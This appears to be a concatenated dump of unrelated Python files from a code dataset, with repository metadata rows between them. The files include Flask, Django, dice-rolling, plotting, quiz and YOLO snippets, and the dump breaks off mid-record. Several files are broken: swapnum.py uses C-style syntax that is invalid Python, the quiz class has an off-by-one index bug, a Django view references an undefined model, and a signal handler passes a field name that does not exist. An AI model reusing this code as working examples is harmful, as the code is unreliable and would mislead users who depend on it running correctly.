api.add_resource(reloadModel, '/reloadModel')
api.add_resource(getAvailableModels, '/getAvailableModels')
api.add_resource(getAvailableFeatures, '/getAvailableFeatures')
# Development entry point (Flask built-in server; not for production use).
if __name__ == '__main__':
    application.run(debug=True, port=60000)
| [
"felipe.pqi@gmail.com"
] | felipe.pqi@gmail.com |
204aa6d13a66a0db1220d1ef9864c83c98c175d0 | efd6a277c2d5bffdfba6ccb4d5efd555e652d29e | /chap7/7.7.py | 7c207a1ed18a1835e5860abdacf3a292352aca05 | [] | no_license | CavalcanteLucas/cookbook | dd57583c8b5271879bb086783c12795d1c0a7ee8 | 09ac71e291571e3add8d23d79b1684b356702a40 | refs/heads/master | 2020-03-25T03:09:39.608599 | 2019-09-13T04:43:23 | 2019-09-13T04:43:23 | 143,325,952 | 0 | 0 | null | 2020-09-25T05:46:30 | 2018-08-02T17:32:08 | Python | UTF-8 | Python | false | false | 45 | py | # Capturing Variable in Anonymous Functions
| [
"thesupervisar@gmail.com"
] | thesupervisar@gmail.com |
b1bca0d09d203d8208286ee334ddf76ec807a68e | c0d5fc26ba84365aae197541d946d79fa4eb8dae | /mechanics.py | a7adc77a82d6ec8aff8b46bf20a48456bb2849d2 | [] | no_license | Amperthorpe/PythonTextGame | 45ef7a21eba536afd4d2d9a0f6d6c62b520833ef | 9178257133821f03526c29252aec801732caca8d | refs/heads/master | 2021-09-24T02:59:16.975687 | 2018-10-02T06:15:15 | 2018-10-02T06:15:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 689 | py | from __future__ import annotations
import random
def roll_dice(count, dice, full=False):
    """Roll `count` dice, each with `dice` sides.

    Returns the total by default; when `full` is True, returns a
    (total, individual_rolls) tuple instead.
    """
    rolls = []
    for _ in range(count):
        rolls.append(random.randint(1, dice))
    total = sum(rolls)
    return (total, rolls) if full else total
class DiceRoller:
    """Callable that remembers a fixed (count, dice) pair for repeated rolls."""

    def __init__(self, count, dice):
        self.count = count
        self.dice = dice

    def __call__(self, *args, **kwargs):
        """Roll the configured dice; pass full=True to also get the individual rolls."""
        want_full = kwargs.get('full', False)
        return roll_dice(self.count, self.dice, full=want_full)
def _test():
    """Smoke test: print four totals from rolling 5d20."""
    roller = DiceRoller(5, 20)
    for _ in range(4):
        print(roller())
# Run the smoke test only when executed directly, not on import.
if __name__ == '__main__':
    _test()
| [
"alleluid@users.noreply.github.com"
] | alleluid@users.noreply.github.com |
4787afa1f34e43341bfb363697036945bc1f6b5a | bf4b4e3e0ee17633800e206f2a1b899de81d2284 | /www/cgi-bin/backup/twitter/graph.py | 9f7a47813485c83c6c1930c27361312747a6c2b3 | [] | no_license | gurdasanivishal/hadoop_Automation_via_Dockers | 5e9fcbb79185096f173deddcb794c8a1c20bff25 | 8badba4ebda2ce563e2e3593a32b8b919ed87acc | refs/heads/master | 2020-06-02T08:40:08.730203 | 2019-11-21T06:28:15 | 2019-11-21T06:28:15 | 191,103,089 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 942 | py | #!/usr/bin/python
import matplotlib.pyplot as plt
import csv
import commands
# cutting file pnum
commands.getoutput("sudo cat ttt.txt | awk -F'(' '{print $2}' | cut -d, -f1 | cut -d= -f2 >pnum.txt")
commands.getoutput("sudo cat ttt.txt | awk -F'(' '{print $2}' | cut -d, -f2 | cut -d= -f2 | cut -d')' -f1 >snum.txt")
x = []
y = []
f=open('pnum.txt')
for i in f:
j=i.split()[0]
x.append(j)
print x
f.close()
f=open('snum.txt')
for i in f:
j=i.split()[0]
y.append(j)
print y
f.close()
'''
with open('tweet.csv','r') as csvfile:
plots = csv.reader(csvfile, delimiter=',')
for row in plots:
x.append(row[0])
y.append(row[1])
'''
plt.plot(x,y)
plt.plot(y,x)
plt.scatter(x,y, label='polarity/sensitivity',s=100,c='r')
plt.scatter(y,x, label='sensitivity/polarity',s=150,c='g',marker='*')
plt.xlabel('polarity')
plt.ylabel('sensitivity')
plt.title('SEntiment graphs')
plt.legend()
plt.show()
| [
"vishal.gurdasani@elogist.in"
] | vishal.gurdasani@elogist.in |
466bd43facef0ff807850dc4caf2a5d061758411 | 72af42076bac692f9a42e0a914913e031738cc55 | /01, 특강_210705_0706/02, source/CookData(2021.01.15)/Code03-02.py | 77bba4c75ad3200137cbc7e4f6f9c010afb45baa | [] | no_license | goareum93/Algorithm | f0ab0ee7926f89802d851c2a80f98cba08116f6c | ec68f2526b1ea2904891b929a7bbc74139a6402e | refs/heads/master | 2023-07-01T07:17:16.987779 | 2021-08-05T14:52:51 | 2021-08-05T14:52:51 | 376,908,264 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 536 | py | katok = ["다현", "정연", "쯔위", "사나", "지효"]
def insert_data(position, friend):
    """Insert `friend` into the global `katok` list at index `position`.

    Valid positions run from 0 through len(katok) inclusive; any other
    value prints an error message and leaves the list unchanged.
    """
    if not 0 <= position <= len(katok):
        print("데이터를 삽입할 범위를 벗어났습니다.")
        return
    katok.append(None)            # grow the list by one empty slot
    idx = len(katok) - 1
    while idx > position:         # shift elements right, from back to front
        katok[idx] = katok[idx - 1]
        idx -= 1
    katok[position] = friend      # place the new friend in the freed slot
# Demo: insert into the middle, then insert at the current end (position == len).
insert_data(2, '솔라')
print(katok)
insert_data(6, '문별')
print(katok)
| [
"goareum7@gmail.com"
] | goareum7@gmail.com |
911c2d2d63014735f36b0af77064c085eab848fe | bb5f310f342cf1a92bb11d02701ceda9a20d00b7 | /article/migrations/0001_initial.py | 3fcabbb6fca931534f4b3a529fadb579d7c5ca08 | [] | no_license | agecspnt/djangoProject | f340ad3e437537bdf928e2e77e5d218e7f58d1da | bb4200e35c91c39b87f96988648e3b95b95041d9 | refs/heads/master | 2023-07-13T22:39:48.022470 | 2021-08-22T04:07:01 | 2021-08-22T04:07:01 | 398,515,520 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,056 | py | # Generated by Django 3.2.6 on 2021-08-15 04:42
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    """Initial (auto-generated) schema for the article app: creates ArticlePost."""
    initial = True
    dependencies = [
        # Depends on whatever model AUTH_USER_MODEL is swapped to.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        migrations.CreateModel(
            name='ArticlePost',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=100)),
                ('body', models.TextField()),
                ('created', models.DateTimeField(default=django.utils.timezone.now)),
                ('updated', models.DateTimeField(auto_now=True)),
                ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                # Newest posts first by default.
                'ordering': ('-created',),
            },
        ),
    ]
| [
"agecspnt@gmail.com"
] | agecspnt@gmail.com |
aada5ea54cf6f63628a5f4658d0f197fdaa086f1 | 10ed6af8759eb1d9875b98cba8612a0134afa563 | /project_1/shortenersite/urls.py | ee9a9a26add4d08c629c7f14361662fc7807e019 | [] | no_license | SanGlebovskii/UrlShortener | bc321482e1266fea5358102c4aad23c94fb3e903 | fb726987a67b63fe1270b90c6a46ff76c5e2e473 | refs/heads/master | 2023-08-26T21:12:57.102118 | 2021-10-19T16:31:24 | 2021-10-19T16:31:24 | 419,461,813 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 84 | py | from django.contrib import admin
from django.urls import path
from .views import *
| [
"bychkokatya@gmail.com"
] | bychkokatya@gmail.com |
e8a73dea3080e6faa22a2f991da6b5bf4747d68b | a5a1230d8ae51b6b52b11333fd9fe8458eb7fe91 | /phaseTest/user.py | d11d4848ffa9c9931d883bf016a18722315af349 | [] | no_license | TTTTTong/Python_Blog_Demo | a8fef07718f255809603d64d952815f3fbb4c6a0 | 8e4bf43d3d8bd3d2af881fa433798cb4823bfbd2 | refs/heads/master | 2021-07-23T07:43:06.186538 | 2017-10-31T15:50:58 | 2017-10-31T15:50:58 | 106,183,113 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 187 | py | # -*- coding: utf-8 -*-
from www.orm import Model, StringField, IntegerField
class User(Model):
    """ORM model mapped to the `users` table via the www.orm mini-ORM."""
    __table__ = 'users'
    # NOTE(review): keyword is spelled `primary_Key`; most Field implementations
    # expect `primary_key` -- verify against www.orm's IntegerField signature.
    id = IntegerField(primary_Key=True)
    name = StringField()
"t15529208705@gmail.com"
] | t15529208705@gmail.com |
6e7271c8a1eb8bc295f3ece232488fbacef01969 | a5483feae3a201d116629fa2e55a03e51bbe7478 | /signin/models.py | 93e2908a1739b155b10bc3d83355a69c00633c84 | [] | no_license | basavaraj4321/WantBook_3 | 8f6f3e2b3e6e7166bc37b2947ac8aeda2368b46e | 3ea402e6f0cbf9d99307114fe557247c74b9b5a4 | refs/heads/master | 2020-03-15T01:10:22.931127 | 2018-05-02T17:57:22 | 2018-05-02T17:57:22 | 131,887,051 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 618 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
# Create your models here.
class BookUser(models.Model):
    """Profile extending Django's built-in auth User with contact details."""
    # NOTE(review): Django >= 2.0 requires an explicit on_delete argument here.
    user1 = models.OneToOneField(User)
    email_id = models.EmailField(max_length = 50)
    phone_number = models.IntegerField(default = 0)
    address = models.TextField(max_length=100)
def create_profile(sender, **kwargs):
    """post_save hook: create a BookUser profile for each newly created User.

    Fix: the profile was previously created with `user=...`, but the
    BookUser relation field is named `user1`, so the signal handler raised
    on every save; the kwarg now matches the model field. The unused
    `user_profile` local was also dropped.
    """
    if kwargs['created']:
        BookUser.objects.create(user1 = kwargs['instance'])
# Create a profile automatically whenever a new auth User row is saved.
post_save.connect(create_profile, sender=User)
| [
"basu@Basavarajs-MacBook-Air.local"
] | basu@Basavarajs-MacBook-Air.local |
e6c38b138e63c75a95de70360b78e6deecaa3870 | a2f208c5cc0c941eec7a7d1307817ec7918f779d | /python_scripts/01.py | 5db3f7067dd90934628fdaa5b0cc63d29ff72c42 | [] | no_license | Asteriskers/NoteBook_Home_HP | fd3c98d9651981ba8faea786ba4ce3fac48b31a2 | bdb52dfcf7f9a216df4e548188602241744a0389 | refs/heads/master | 2020-07-25T05:09:35.082484 | 2019-09-14T02:52:19 | 2019-09-14T02:52:19 | 208,175,513 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 40 | py | #/bin/python
# Minimal demo: bind a string and echo it to stdout.
var = "tesst"
print(var)
| [
"notebook_home_hp@163.com"
] | notebook_home_hp@163.com |
ea92e1cf286bc36f8468711bae7e14fbe169fd0b | 1ae0d8eb0cd5db0bd886b40912b910bbba908b70 | /swapnum.py | 7937865bc026c1d10ca5fff85ec2802ec275047e | [] | no_license | keerthanachinna/beginnerset3 | fae07713eac49f121e103b118e495019bf4102af | 1cc4fe785d35035a184f128865019acb17ccf4e5 | refs/heads/master | 2020-03-21T09:55:59.035254 | 2018-08-08T15:56:26 | 2018-08-08T15:56:26 | 138,424,981 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 277 | py | def main():
printf("enter the numbers")
n1=int(raw_input(enter the n1:))
n2=int(raw_input(enter the n2:))
print(n1)
print(n2)
if((n1<100000)&&(n2<100000)):
t=n1
n1=n2
n2=t
printf("after swappping the numbers are %d,%d",n1,n2)
else
printf("number with in only 100000");
| [
"noreply@github.com"
] | noreply@github.com |
0faba6d5b256068f61ae56a45c5afb98e6ce9c93 | 13bf5b764ee3b7b425991d03062490e6f28def6f | /accounts/urls.py | 3ab45a5961ab3bbf549dafde96ef53d2c9bf5a6c | [] | no_license | joseChQ/sof2 | 806b0197ef95c0a67bc27fb4e56342b2a9f172a2 | 4c92581ad6b73bc4acf4392c3835dae66283fca0 | refs/heads/master | 2022-12-14T12:21:50.402638 | 2020-09-10T13:21:29 | 2020-09-10T13:21:29 | 294,418,844 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 149 | py | # acounts/urls.py
from django.urls import path
from . import views
# URL routes for the accounts app.
urlpatterns = [
    # Map /signup/ to the class-based sign-up view.
    path('signup/', views.SignUpView.as_view(), name='signup'),
]
"63762044+joseChQ@users.noreply.github.com"
] | 63762044+joseChQ@users.noreply.github.com |
6757df9b87934f4ad429c3afdd0a94ab1d0c296d | 721ad225fad30f599cc79bbb0c76a38c07214d7a | /K Fold Cross-Validated Neural Network with 2 Hidden Layers.py | 68cd015efde17150031b85e456b454d4dd0bd297 | [] | no_license | karimcarroum9/Master-of-Research-Data-Science-and-eSports | 91ec1202e5526edb451065e5c1c012799ab9155f | e6bf0847a7a6d051f78b033a1326b552cdce5c47 | refs/heads/master | 2022-04-18T22:15:10.988764 | 2020-04-17T22:38:07 | 2020-04-17T22:38:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,205 | py | ### Neural Network with Cross-Validation of Activation Functions and Hidden Units (Two Hidden Layers)
### Karim Carroum Sanz - karim.carroum01@estudiant.upf.edu
### Dataset of League of Legends Season 9 Professional e-Sports Players' Statistics
import pandas as pd
import numpy as np
import csv
import tensorflow as tf
from tensorflow import keras
from keras import losses, metrics
from keras.models import Sequential
from keras.layers import Dense
from sklearn.model_selection import KFold
from datetime import datetime
# Import dataset. Note: here I call it train, but later this dataset is splitted into train and test datasets.
train = pd.read_csv("sselected.csv") # Sample the train dataset to ensure "randomness"
# Drop the first column (row index written when the sample was saved).
train = train.iloc[:,1:(train.shape[1]+1)]
# Features: every column after the first; target: the first remaining column.
train_x = train.iloc[:,1:(train.shape[1]+1)]
train_y = train.iloc[:,0]
# Model creation function
def create_model(inputs, hu1, hu2, hu_last, actfun1, actfun2, actfun_last, optimizer, metric, loss):
    """Build and compile a feed-forward network with two hidden layers.

    `inputs` is the input dimension; hu*/actfun* set the width and
    activation of each layer (hu_last/actfun_last describe the output
    layer). Returns the compiled Keras model.
    """
    layer_stack = [
        Dense(hu1, input_dim=inputs, activation=actfun1),
        Dense(hu2, activation=actfun2),
        Dense(hu_last, activation=actfun_last),
    ]
    net = Sequential()
    for layer in layer_stack:
        net.add(layer)
    net.compile(loss=loss, optimizer=optimizer, metrics=metric)
    return net
# Cross-Validation by activation functions and hidden units
def cross_val(train_x, train_y, folds, epochs, batch_size, hu1, hu2, hu_last, actfun1, actfun2, actfun_last, optimizer, metric, loss):
    """Run k-fold cross-validation for one network configuration.

    Returns (mean out-of-sample score, mean in-sample score) across folds.

    NOTE(review): reads the module-level `inputs` global for the input
    dimension -- it is not a parameter of this function; confirm it is
    set before calling.
    NOTE(review): the model is built once and then fit on every fold in
    turn, so training accumulates across folds and the per-fold scores
    are not independent estimates.
    """
    #Statistics
    folds_scores_out_of_sample = []
    folds_scores_in_sample = []
    model = create_model(inputs=inputs, hu1=hu1, hu2=hu2, hu_last=hu_last, actfun1=actfun1, actfun2=actfun2,
                         actfun_last=actfun_last, optimizer=optimizer, metric=metric, loss=loss)
    for train_index, test_index in KFold(folds).split(train_x):
        # Partition features and target into this fold's train/test splits.
        cv_train_x, cv_test_x = train_x.iloc[train_index], train_x.iloc[test_index]
        cv_train_y, cv_test_y = train_y.iloc[train_index], train_y.iloc[test_index]
        model.fit(cv_train_x, cv_train_y, epochs=epochs, batch_size=batch_size)
        folds_scores_out_of_sample.append(model.evaluate(cv_test_x,cv_test_y))
        folds_scores_in_sample.append(model.evaluate(cv_train_x,cv_train_y))
    return np.mean(folds_scores_out_of_sample), np.mean(folds_scores_in_sample)
def neural_network_reg_cv(train_x, train_y, inputs, hu1, hu2, hu_last, actfun, metric, loss, optimizer, folds,
                          epochs=20, batch_size=20, multistarts=False, multistarts_info=False):
    """Grid-search a 2-hidden-layer regression network over hidden-unit
    counts and activation functions, scoring each configuration with
    k-fold cross-validation.

    For every combination of layer sizes (1..hu1, 1..hu2, 1..hu_last) and
    activation-function triple from `actfun`, runs `cross_val` once per
    multistart and records [mae_out_of_sample, mae_in_sample, hu1, hu2,
    hu_last, actfun1, actfun2, actfun_last] in a summary dict, also
    exported to results.csv (which needs to be transposed).

    Behavior by flags:
    - multistarts falsy: one run per configuration.
    - multistarts=N, multistarts_info=False: keep only the best (lowest
      out-of-sample MAE) of the N starts per configuration.
    - multistarts=N, multistarts_info=True: record every start.

    Fixes over the previous version:
    - the best-start tracker was reset inside the multistart loop, so the
      *last* start (not the best) was kept; best-so-far is now tracked
      across starts.
    - the info branch appended to a single shared list, so every summary
      key aliased the same ever-growing record; each start now gets its
      own record.

    Returns (summary, total_time).
    """
    summary = {}  # key -> [mae_out, mae_in, hu1, hu2, hu_last, act1, act2, act_last]
    key = 0       # also counts recorded entries

    # Some indicators of runtime
    start_time = datetime.now()
    iterations = hu1 * hu2 * hu_last * len(actfun) ** 3 * folds
    print(iterations)

    n_starts = multistarts if multistarts else 1
    record_every_start = bool(multistarts) and multistarts_info

    for hui in range(1, hu1 + 1):
        for huj in range(1, hu2 + 1):
            for huk in range(1, hu_last + 1):
                for actfun1 in actfun:
                    for actfun2 in actfun:
                        for actfun_last in actfun:
                            best = None  # best (mae_out, mae_in) across starts
                            for _ in range(n_starts):
                                # Cross-validation for this configuration.
                                stats = cross_val(train_x, train_y, folds, epochs, batch_size,
                                                  hui, huj, huk, actfun1, actfun2, actfun_last,
                                                  optimizer, metric, loss)
                                if best is None or stats[0] < best[0]:
                                    best = stats
                                if record_every_start:
                                    summary[key] = [stats[0], stats[1], hui, huj, huk,
                                                    actfun1, actfun2, actfun_last]
                                    key = key + 1
                            if not record_every_start:
                                summary[key] = [best[0], best[1], hui, huj, huk,
                                                actfun1, actfun2, actfun_last]
                                key = key + 1
                            # Progress indicator: entries recorded vs. combinations.
                            print(key, iterations / folds)

    # Export to csv in current directory
    results = pd.DataFrame.from_dict(summary)
    results.to_csv('results.csv')  # Csv needs to be transposed

    end_time = datetime.now()
    total_time = end_time - start_time
    return summary, total_time
# Model's hyperparameters // Model with 2 hidden layers, regression
actfun = ["sigmoid", "tanh", "linear"] # Activation functions
inputs = train.shape[1] - 1 # Number of training variables
hu1 = 12 # 1st hidden layer's maximum units
hu2 = 6 # 2nd hidden layer's maximum units
hu_last = 1 # Hidden units in output layer --> 1 for regression, more for classification
optimizer = "rmsprop" # "adam", "rmsprop", "nadam", "sgd", "adagrad", "adadelta" --> rmsprop faster, adam yields higher accuracy
metric = [metrics.mae] # Epoch's performance metric
loss = losses.mean_absolute_error # Loss function epoch's score
folds = 2 # Number of folds for the cross-validation
epochs = 20 # Starting weights close to linearity, so lower amount of epochs implies activation fcts closer to linearity
batch_size = 20 # Reduce it to reasonable levels to improve the generalisation of the models, but runtime increases multiplicatively
multistarts = 2 # Set to False, 0 or 1 if no multistarts are desired. Best multistart is chosen, not the average
multistarts_info = True # Set to true to output mae's out and in sample for each multistart, even if they are not the optimal for their corresponding iteration
# Can be used to calculate mae as an average of multistarts instead than as a min
# Results
# Runs the full grid search; cv_nn is (summary dict, total runtime).
cv_nn = neural_network_reg_cv(train_x=train_x, train_y=train_y, inputs=inputs, hu1=hu1, hu2=hu2, hu_last=hu_last, actfun=actfun, metric=metric,
                              loss=loss, optimizer=optimizer, folds=folds, epochs=epochs, batch_size=batch_size, multistarts=multistarts, multistarts_info=multistarts_info)
print("Running time: ", cv_nn[1])
| [
"noreply@github.com"
] | noreply@github.com |
67268010ff59ff1aae3d761a98739780226f70d5 | 82bf9b7dce20f045a02625b4d206a141ae63e99a | /PythonParticipant/core/transaction.py | cfe68c3315c10b57b70538d2edb3e2014e38a87e | [] | no_license | acidoth/Participants | 408a53dfa4c4b17045ca5d0928040666141faea2 | d7488a69c3411ee008f0c4767b5941d7f56d2790 | refs/heads/master | 2016-09-11T12:54:45.380017 | 2013-12-05T05:18:11 | 2013-12-05T05:18:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 883 | py | #!/usr/bin/python
import MySQLdb
class Transaction:
    """Value object describing one customer transaction, plus an optional
    lazily opened MySQL connection."""

    def __init__(self, transactionid, customername, fromdestination, todestination, date):
        self.transactionId = transactionid
        self.customername = customername
        self.fromdestination = fromdestination
        self.todestination = todestination
        self.date = date
        # No DB connection until setConnection() is called.
        self.connection = None

    def setConnection(self, host, username, password, dbname):
        """Open a MySQL connection and keep it on this transaction."""
        conn = MySQLdb.connect(host, username, password, dbname)
        self.connection = conn

    def getConnection(self):
        """Return the stored connection (None until setConnection runs)."""
        return self.connection

    def getTransactionId(self):
        return self.transactionId

    def getCustomerName(self):
        return self.customername

    def getFromDesti(self):
        return self.fromdestination

    def getToDesti(self):
        return self.todestination

    def getDate(self):
        return self.date
| [
"mpirinthapan@gmail.com"
] | mpirinthapan@gmail.com |
f821ee1ff0b336f0de182dad015449661d02f140 | 935ee20c9eda46f352d0dc96537959b1a5bff0af | /venv/Scripts/django-admin.py | 8a110aeff30cff1af03bbc084aae1ba9862b5895 | [] | no_license | DASARIVAMSHI/basicdjango | 168dd509a38fc46f5ed403913223b1a0f7162185 | 19d630feb8603c2a34679a3a0329473a4bc4bbc2 | refs/heads/master | 2023-03-28T23:53:32.412412 | 2021-03-30T17:18:41 | 2021-03-30T17:18:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 713 | py | #!c:\users\d p naidu\pycharmprojects\08\03\15\03\model\venv\scripts\python.exe
# When the django-admin.py deprecation ends, remove this script.
import warnings
from django.core import management
try:
from django.utils.deprecation import RemovedInDjango40Warning
except ImportError:
raise ImportError(
'django-admin.py was deprecated in Django 3.1 and removed in Django '
'4.0. Please manually remove this script from your virtual environment '
'and use django-admin instead.'
)
if __name__ == "__main__":
warnings.warn(
'django-admin.py is deprecated in favor of django-admin.',
RemovedInDjango40Warning,
)
management.execute_from_command_line()
| [
"190330272@klh.edu.in"
] | 190330272@klh.edu.in |
a26442c63dd7331ef05ba4ecd0d0945d4b74a43b | 9750584fed8c5b89ff72c05db57023988be34b79 | /app/views.py | 6137fe5ff0a0f92deeb4e1b791a97a96ff78936c | [] | no_license | tariik/django-heroku-app | 14ecf786837309626f79ec396d740070099a917c | fa2b29ab71f55b8cc7f51d364ac1134ced21f779 | refs/heads/master | 2023-08-17T19:20:30.490487 | 2020-06-06T17:14:44 | 2020-06-06T17:14:44 | 268,361,877 | 0 | 0 | null | 2021-09-22T19:07:41 | 2020-05-31T20:49:50 | Python | UTF-8 | Python | false | false | 619 | py | from django.shortcuts import render
from django.http import HttpResponse
from pprint import pprint
from django.core import serializers
from .models import User
# Create your views here.
def home(request):
    """Render the landing page with every registered user and a greeting."""
    context = {
        'users': User.objects.all(),
        'text': 'hello world',
    }
    return render(request, "home.html", context)
def db(request):
    """Create one Greeting row, then render the full greeting list.

    NOTE(review): `Greeting` is never imported in this module (only `User`
    is), so this view raises NameError as written -- confirm the intended
    model and add the import.
    """
    greeting = Greeting()
    greeting.save()
    greetings = Greeting.objects.all()
    return render(request, "db.html", {"greetings": greetings})
| [
"khalfaoui.t@hotmail.com"
] | khalfaoui.t@hotmail.com |
fe67b587acb41838b627af66ca34a11ad458a34e | 7aa4e4bfee6b0a265a4bcf1b7f81291f3299f43b | /Day17/quiz_brain.py | 144287abfa11e8d10c95fbeb19d7332d51e1fc84 | [] | no_license | fazer1929/100DaysOfCode_Python | 464b54e33fdda25f985a4a7fde327ceafc88fa93 | 313cd77ad7266b18fd2442548569cf96f330ce26 | refs/heads/main | 2023-05-05T01:59:48.936964 | 2021-05-30T14:34:57 | 2021-05-30T14:34:57 | 311,775,381 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 868 | py | class QuizBrain:
    def __init__(self,qlist):
        # Questions to ask; each object exposes .text and .ans.
        self.question_list = qlist
        # Index of the next question to ask.
        self.question_number = 0
        # Count of correct answers so far.
        self.score = 0
def nextQuestion(self):
self.question_number += 1
question = self.question_list[self.question_number]
ans = input(f"Q.{self.question_number}: {question.text} (True/False)? : ")
self.checkAnswer(ans)
    def stillHasQuestion(self):
        # True while unasked questions remain.
        return self.question_number < len(self.question_list)
    def checkAnswer(self,ans):
        """Grade `ans` (case-insensitive) against the question at the current
        index, bump the score on a match, and print progress.

        NOTE(review): indexes question_list[self.question_number]; callers
        must invoke this while question_number still points at the question
        that was just asked.
        """
        if(ans.lower() == self.question_list[self.question_number].ans.lower()):
            print("You Got It Right!")
            self.score += 1
        else:
            print("You Got It Wrong!!!")
            print(f"The Correct Answer Was {self.question_list[self.question_number].ans}")
        print(f"Your Current Score is {self.score}/{self.question_number}")
"abhishekagrawal8888@gmail.com"
] | abhishekagrawal8888@gmail.com |
e0061b8f859c7e53737179b193420ee642e22eb7 | d94f26bf6579a5040212b4b9b4680cd1f29afa5b | /DS3_BaseStructures/lesson4_doubleENdedQueue.py | c8c499940c2234f254c8f702c1fac0124a8b50bb | [] | no_license | z1015784643/dataStucatures | c8a9b37534392c361cc6ab8fdcf5b403d824933d | 98d2858263a22ce8ba708f053d86293d3ef1c1a3 | refs/heads/master | 2022-07-17T02:40:39.664487 | 2020-05-20T09:41:45 | 2020-05-20T09:41:45 | 261,633,190 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,327 | py | '''
栈:后进先出(顶部进顶部出)
队列:先进先出(队尾进,队首出)
双端队列:一系列元素的有序集合。其两端成为队首(front)和队尾(rear),元素在到达两端之前始终位于双端队列。
与队列不同的地方在于:双端队列对元素的添加和删除限制不那么严格,元素可以从两端插入,也可以从两端删除。
总结来说:双端队列拥有栈和队列各自拥有的所有功能
抽象数据类型(ADT)
Deque() 创建一个空双队列,无参数,返回值为Deque对象
addFront() 在队首插入一个元素,参数为待插入元素,无返回值
addRear(item) 在队尾移插入一个元素,参数为待插入元素,无返回值
removeFront() 在队首移出一个元素,无参数,返回该移出的元素,双端队列会被改变
removeRear() 在队尾移出一个元素,无参数,返回该移出的元素,双端队列会被改变
isEmpty() 判断双端队列是否为空,无参数,返回布尔值
size() 返回双端队列中数据项的个数,无参数,返回值为整型数值
'''
class Deque():
    """Double-ended queue backed by a Python list.

    The rear lives at index 0 and the front at the end of the backing
    list, so front operations are O(1) and rear operations are O(n).
    """

    def __init__(self):
        self.items = []

    def isEmpty(self):
        """Return True when the deque holds no items."""
        return not self.items

    def size(self):
        """Return the number of stored items."""
        return len(self.items)

    def addFront(self, item):
        """Insert item at the front (end of the backing list)."""
        self.items.append(item)

    def addRear(self, item):
        """Insert item at the rear (index 0 of the backing list)."""
        self.items.insert(0, item)

    def removeFront(self):
        """Remove and return the front item."""
        return self.items.pop()

    def removeRear(self):
        """Remove and return the rear item."""
        rear_item = self.items[0]
        del self.items[0]
        return rear_item
# Demo: exercise both ends of the deque and show the results.
d = Deque()
print(d.isEmpty())
d.addRear(4)
d.addRear('dog')
d.addFront('cat')
d.addFront(True)
print(d.size())
print(d.isEmpty())
d.addRear(8.4)
print(d.removeRear())
print(d.removeFront())
'''
回文词
'''
# from pythonds.basic.deque import Deque
# def palChecher(aString):
# charDeque = Deque()
# for ch in aString:
# charDeque.addFront(ch)
# print(charDeque.size())
#
# plalindrome = True
# while charDeque.size() > 1 and plalindrome:
# first = charDeque.removeFront()
# last = charDeque.removeRear()
# if first != last:
# plalindrome = False
# return plalindrome
#
# print(palChecher('121'))
# print(palChecher('1223'))
| [
"1015784643@qq.com"
] | 1015784643@qq.com |
a26e37a02f4f4268885227fc0f04aa6bf61e454b | 1c9c334d3de6217ca8a30c94e0f6fbb1104c8aa4 | /api_server/urls.py | e812944931b33ed95e8766e342762f61b9ebd5e3 | [] | no_license | rahulmishra24/notes-api-server | fbe556edb5d2dbf6c8b01929965081704a067280 | 75539486bbcff0b0f33374b57bcbabe48e343847 | refs/heads/master | 2023-02-24T11:29:05.872779 | 2021-01-27T18:02:10 | 2021-01-27T18:02:10 | 333,503,853 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 227 | py | from django.urls import include, path
from rest_framework import routers
from . import views
# Register NoteViewSet under /notes via DRF's default router.
router = routers.DefaultRouter()
router.register(r'notes', views.NoteViewSet)
urlpatterns = [
    # Expose all router-generated routes at the app root.
    path('', include(router.urls)),
]
| [
"mishrarahul215@gmail.com"
] | mishrarahul215@gmail.com |
86341d92d4860c2318af6b7c2be30b2b9d08ec06 | 156392eef4f888de81190e3d45e620fe55f55544 | /yolo.py | e0abc816425d2482579473e34ca04ea2106bcd7d | [] | no_license | khordoo/traffic-watch-object-detection | 6d29474360601721427ca42e1e1e885c2f6571f7 | 1040b8682f4ccecb0b88583b71bde56bbcc61184 | refs/heads/master | 2022-12-06T00:00:37.847641 | 2020-05-16T19:06:32 | 2020-05-16T19:06:32 | 207,481,530 | 8 | 2 | null | 2022-11-22T04:14:19 | 2019-09-10T06:27:47 | Python | UTF-8 | Python | false | false | 419 | py | from darkflow.net.build import TFNet
class YOLO:
    """
    Python Wrapper for YOLO
    """
    # Class-level defaults shared by every detector instance.
    displayImageWindow = False
    threshold = 0.12  # minimum confidence for a detection to be reported
    options = {
        'model': 'cfg/yolo.cfg',
        'load': 'weights/yolov2.weights',
        'threshold': threshold
    }
    def __init__(self):
        # Building TFNet loads the network weights -- slow; construct once.
        self.tfnet = TFNet(self.options)
    def detect(self, image):
        """Run the network on `image` and return darkflow's prediction list."""
        return self.tfnet.return_predict(image)
| [
"m.khordoo@gmail.com"
] | m.khordoo@gmail.com |
8d22ca41c5fdd160170de7ddbeba78eb0decedcb | 06fd2c4908e64a40bfd34ec20a8e7d7a59e3aa01 | /roombooking/account/migrations/0006_delete_reservation.py | dc821fc0171a8482c5138c4713230441290aac2f | [
"MIT"
